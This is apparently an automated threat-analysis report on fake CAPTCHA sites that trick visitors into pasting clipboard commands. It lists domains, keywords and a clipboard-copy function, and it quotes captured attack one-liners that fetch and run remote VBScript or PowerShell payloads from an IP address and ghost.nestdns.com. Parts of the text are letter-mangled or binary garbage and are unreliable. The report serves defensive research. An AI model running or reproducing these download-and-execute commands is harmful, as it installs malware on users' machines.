ClickGrab Threat Analysis Report - 2025-12-27
Generated on 2025-12-27 02:46:38
Executive Summary
- Total sites analyzed: 59
- Sites with malicious content: 36
- Unique domains encountered: 34
- Total URLs extracted: 242
- PowerShell download attempts: 3
- Clipboard manipulation instances: 211
Domain Analysis
Most Frequently Encountered Domains
- www.google.com: 37 occurrences
- t.me: 34 occurrences
- i.postimg.cc: 33 occurrences
- icons.duckduckgo.com: 33 occurrences
- ${host}: 33 occurrences
- www.webgo.de: 10 occurrences
- godprox.cc: 8 occurrences
- svetvip.ru: 8 occurrences
- api.whatsapp.com: 6 occurrences
- mc.yandex.ru: 4 occurrences
- www.thawte.com: 2 occurrences
- www.digicert.com: 2 occurrences
- use.fontawesome.com: 2 occurrences
- vk.com: 2 occurrences
- www.facebook.com: 2 occurrences
URL Pattern Analysis
reCAPTCHA imagery
2 occurrences across 1 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)
Font resources
2 occurrences across 1 distinct URLs
https://use.fontawesome.com/releases/v5.0.0/css/all.css(2 times)
CDN hosted scripts
2 occurrences across 2 distinct URLs
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1(1 times)https://336118.selcdn.ru/Gutsy-Culebra/products/Cloudflare-Logo.png(1 times)
Google resources
37 occurrences across 4 distinct URLs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent(33 times)https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)https://www.google.com/intl/en/policies/privacy/(1 times)https://www.google.com/intl/en/policies/terms/(1 times)
Suspicious Keyword Analysis
Total Keywords Found: 688 (43 unique)
Keyword Categories
Social Engineering
17 unique keywords
Verification IDVerify You Are HumanVerification Hashverificationverification-idverification_idverification idChecking if you are humanVerify you are humanrobot- ...and 7 more
Obfuscation Indicators
1 unique keywords
Command iine: [2]RemoveFiiesRemoving fiiesRemoveIniVaiuesRemoving INI fiies entriesRemoveODBCRemoving ODBC componentsSeifRegModuiesRegistering moduiesFiie: [i], Foider: [2]RemoveShortcutsRemoving shortcutsSeifUnregModuiesUnregistering moWY[�\�_b�ceg��di�jimo�hpquruvwy{|}~������������������#�����-�&��)�������K ����.���aZ���^������z�����[�����A�������������� `
System Commands
14 unique keywords
exec(command = 'cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';Invoke-WebRequestconst command =cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;";`cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';wscriptcmdcmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';command =cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\Downioads\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;";- ...and 4 more
Verification Text
3 unique keywords
Hiddenray idhidden
Technical Terms
8 unique keywords
Ray IDBypassfailed_to_retrieveiex.EXEBitmapbitmap.exe
Most Frequent Keywords
- robot: 38 occurrences
- hidden: 38 occurrences
- CAPTCHA Verification: 36 occurrences
- I am not a robot: 36 occurrences
- Robot: 36 occurrences
- Verification: 36 occurrences
- verification: 36 occurrences
- verification-id: 36 occurrences
- To better prove you are not a robot: 36 occurrences
- Verification ID: 35 occurrences
- Ray ID: 34 occurrences
- Checking if you are human: 34 occurrences
- Verify you are human: 34 occurrences
- const command =: 33 occurrences
- cmd: 31 occurrences
Similar Keyword Patterns
Groups of keywords that appear to be variations of the same theme:
Group 1: invoke, Invoke
Group 2: .EXE, .exe
Group 3: Bitmap, bitmap
Group 4: CAPTCHA Verification, Verification, verification
Group 5: Verification Hash, verification-id, verification_id, Verification ID, verification id
JavaScript Obfuscation Analysis
Obfuscation Sophistication Score: 0/7
Potential Base64 Encoded Content
These strings may contain encoded malicious payloads:
com/recaptcha/about/images/reCAPTCHA0efb9e18a506c7aea235aab0b65f33cfentriesRemoveODBCRemoving/bitrix/tools/captchashortcutsSeifUnregModuiesUnregistering
Clipboard Manipulation Analysis
Detected clipboard manipulation in 211 instances.
Document.Execcommand Copy
Found in 107 snippets (50.7% of clipboard code)
Examples:
try { document.execCommand('copy')
document.execCommand("copy")
Textarea Manipulation
Found in 107 snippets (50.7% of clipboard code)
Examples:
tListener("click", function () { const textarea = document.createElement('textarea'
ng is the safe placeholder above const textarea = document.createElement('textarea'
ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
Complete Malicious Functions
Function 1:
function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }
Report truncated for web display. Full data available in JSON.